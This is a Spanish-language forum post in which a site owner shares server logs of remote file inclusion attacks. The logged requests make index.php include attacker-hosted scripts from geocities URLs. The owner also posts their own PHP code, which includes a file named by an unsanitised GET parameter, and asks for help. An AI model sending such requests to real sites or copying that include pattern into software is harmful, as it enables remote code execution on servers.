Ayer tuve un ataque de SPAM a mi servidor, mi proveedor me informo que tenia, era vulnerable mi web site con los includes, motivo por el cual podian entrar y sabotear todo.
Me enviaron este reporte.
Cita:
AL parecer lo que hacian : http://www.geocities.com/mmgroupcoy/baptist/baptist.txtroot@dime93 [/etc/httpd/conf]# egrep -E '.*(GET|POST).*=http:\/\/.*HTTP.*'
/etc/httpd//domlogs/midominio.com.pe
81.199.61.109 - - [17/Oct/2006:22:50:09 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:22:53:11 -0400] "GET
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:22:56:39 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:22:57:04 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.61.109 - - [17/Oct/2006:22:57:40 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.61.109 - - [17/Oct/2006:23:06:34 -0400] "GET
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:23:08:24 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
196.207.10.102 - - [17/Oct/2006:23:09:46 -0400] "GET
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser
1.0.5)"
81.199.173.35 - - [17/Oct/2006:23:41:29 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:23:42:29 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:23:45:40 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
82.206.131.150 - - [17/Oct/2006:23:50:04 -0400] "POST
/index.php?contenido=http://www.geocities.com/aweleoh123/Douglas.txt? HTTP/1.1"
302 372
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/aweleoh123/Douglas.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)"
82.206.131.150 - - [17/Oct/2006:23:50:39 -0400] "POST
/index.php?contenido=http://www.geocities.com/aweleoh123/Douglas.txt? HTTP/1.1"
................aun hay mas de lo mismo..............
/etc/httpd//domlogs/midominio.com.pe
81.199.61.109 - - [17/Oct/2006:22:50:09 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:22:53:11 -0400] "GET
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:22:56:39 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:22:57:04 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.61.109 - - [17/Oct/2006:22:57:40 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.61.109 - - [17/Oct/2006:23:06:34 -0400] "GET
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:23:08:24 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
196.207.10.102 - - [17/Oct/2006:23:09:46 -0400] "GET
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser
1.0.5)"
81.199.173.35 - - [17/Oct/2006:23:41:29 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:23:42:29 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:23:45:40 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
82.206.131.150 - - [17/Oct/2006:23:50:04 -0400] "POST
/index.php?contenido=http://www.geocities.com/aweleoh123/Douglas.txt? HTTP/1.1"
302 372
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/aweleoh123/Douglas.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)"
82.206.131.150 - - [17/Oct/2006:23:50:39 -0400] "POST
/index.php?contenido=http://www.geocities.com/aweleoh123/Douglas.txt? HTTP/1.1"
................aun hay mas de lo mismo..............
Creo que una vez me paso casi lo mismo
![Pensando](http://static.forosdelweb.com/fdwtheme/images/smilies/scratchchin.gif)
Mi codigo era:
Código PHP:
<?php
$admin = $_GET["admin"] ;
if($admin == ""){
$admin="home";
}
?>
.............
<? include($admin.".php");?>
Espero sus comentarios
Por cierto lo que me hicieron es : phpscripting ?
![censurado](http://static.forosdelweb.com/fdwtheme/images/smilies/sho.png)